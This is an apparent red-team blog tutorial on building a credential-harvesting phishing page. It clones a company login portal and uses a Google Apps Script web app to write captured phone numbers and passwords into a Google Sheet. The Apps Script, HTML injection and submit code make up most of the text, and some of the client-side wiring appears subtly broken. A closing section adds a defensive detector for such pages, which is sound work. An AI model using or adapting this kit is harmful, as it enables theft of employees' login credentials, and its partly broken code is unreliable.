Phishing using Google Sheets for Red Team Engagements

For educational purposes only. Unlawful use of phishing techniques is prohibited. Use responsibly, with proper authorization. Creators disclaim any liability for misuse.
This method is useful in a red team assessment or any kind of social engineering assessment where the environment includes internal systems such as employee portals and other company-related portals. It requires only a simple Python server for hosting.
Before integrating Google Sheets, you will need to clone the exact portal or website you are going to use as the bait. Then examine the code to find where the username and password inputs are defined.
I won't talk about cloning a website here because there are many sources that explain how to clone a website :)
Phishing using Google Sheets
1. Navigate to Google Sheets and create a sheet
2. Navigate to Extensions > Apps Script

3. Add the script below to Code.gs
// Google Apps Script code
var SPREADSHEET_ID = 'YOUR_SPREADSHEET_ID';

function doPost(e) {
  var phone = e.parameter.phone;
  var password = e.parameter.password;
  // Open the spreadsheet using its ID
  var sheet = SpreadsheetApp.openById(SPREADSHEET_ID).getActiveSheet();
  // Append the data to the sheet
  sheet.appendRow([phone, password]);
  // Redirect to google.com
  return ContentService.createTextOutput('<script>window.location.href="https://www.google.com";</script>').setMimeType(ContentService.MimeType.HTML);
}
Now replace 'YOUR_SPREADSHEET_ID' with your spreadsheet ID, which can be found in the URL of the Google Sheet you created.
It should look like below,

Change the input fields below to match your web application:
// Append the data to the sheet
sheet.appendRow([phone, password]);
Change the URL below to the one the user should be redirected to once the credentials are given:
// Redirect to google.com
return ContentService.createTextOutput('<script>window.location.href="https://www.google.com";</script>').setMimeType(ContentService.MimeType.HTML);
Once the changes are complete, deploy the Apps Script using the Deploy option.
Select the Web app option as shown below.

Then authorize the web app with your Google account.

Now copy the shareable script URL, move to the cloned web app, and place this URL inside the <head> </head> tag:
<!DOCTYPE html><html><head >
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>TEST</title>
<script src="https://script.google.com/macros/s/tttttttttttt/exec"></script>
</head>
Finally, place the code below after the login input form, referencing your inputs:
<script>
function submitForm() {
  var phone = document.getElementById("phone").value;
  var password = document.getElementById("password").value;
  // Call the Google Apps Script function with the form data
  google.script.run.doPost({ phone: phone, password: password });
}
</script>
Now host your web app on a VPS or your preferred environment and test the login page. Once tested, you will see that the credentials are captured in Google Sheets as below.

This way you will not need PHP or any other server-side functions; you can host a simple Python server on your VPS and share the phishing URL with the users.
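For the blue team reviewing the engagement, the pattern above leaves a recognizable static fingerprint: a login page served from a non-Google host that references an Apps Script web app endpoint. The triage function below is an added example, not code from the original article; the function name, the heuristics and the sample pages (including the `example.test` hosts and the placeholder deployment ID) are assumptions constructed for illustration.

```javascript
'use strict';
// Added defensive example: static triage of a captured HTML page.
// Apps Script web apps are served from /macros/s/<deployment id>/exec (or /dev).
const APPS_SCRIPT_URL = /https:\/\/script\.google\.com\/macros\/s\/([\w-]+)\/(?:exec|dev)\b/gi;
const PASSWORD_INPUT = /<input\b[^>]*\btype\s*=\s*["']?password\b/i;
const SCRIPT_RUN = /\bgoogle\.script\.run\b/;

// Returns the indicators found and whether the combination warrants review:
// a password field plus an Apps Script reference on a host Google does not own.
function triagePage(pageUrl, html) {
  const host = new URL(pageUrl).hostname.toLowerCase();
  const onGoogle = host === 'google.com' || host.endsWith('.google.com') ||
    host.endsWith('.googleusercontent.com');
  const endpoints = [...new Set([...html.matchAll(APPS_SCRIPT_URL)].map((m) => m[0]))];
  const findings = [];
  if (PASSWORD_INPUT.test(html)) findings.push('password-input');
  if (endpoints.length > 0) findings.push('apps-script-endpoint');
  if (SCRIPT_RUN.test(html)) findings.push('google.script.run-call');
  const callsOut = endpoints.length > 0 || findings.includes('google.script.run-call');
  return { host, findings, endpoints,
    suspicious: !onGoogle && findings.includes('password-input') && callsOut };
}

// Constructed sample pages (not captured from any real site).
const SAMPLE_CLONE = `<!DOCTYPE html><html><head>
<title>TEST</title>
<script src="https://script.google.com/macros/s/EXAMPLE_DEPLOYMENT_ID/exec"></script>
</head><body>
<form><input id="phone"><input id="password" type="password"></form>
<script>function submitForm() { google.script.run.doPost({}); }</script>
</body></html>`;
const SAMPLE_BENIGN = `<html><body><form action="/login" method="post">
<input name="user"><input name="pw" type="password"></form></body></html>`;
const SAMPLE_SURVEY = `<html><body><form method="post"
action="https://script.google.com/macros/s/EXAMPLE_DEPLOYMENT_ID/exec">
<input name="feedback"></form></body></html>`;

console.log(triagePage('https://portal.example.test/login', SAMPLE_CLONE));
console.log(triagePage('https://intranet.example.test/login', SAMPLE_BENIGN));
```

The same endpoint pattern can be matched in web proxy or DNS logs to find users who loaded such a page, and the extracted deployment URL is the value to include in an abuse report to Google.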
Thank you for reading, and stay tuned for more insightful write-ups. Your continued support is greatly appreciated!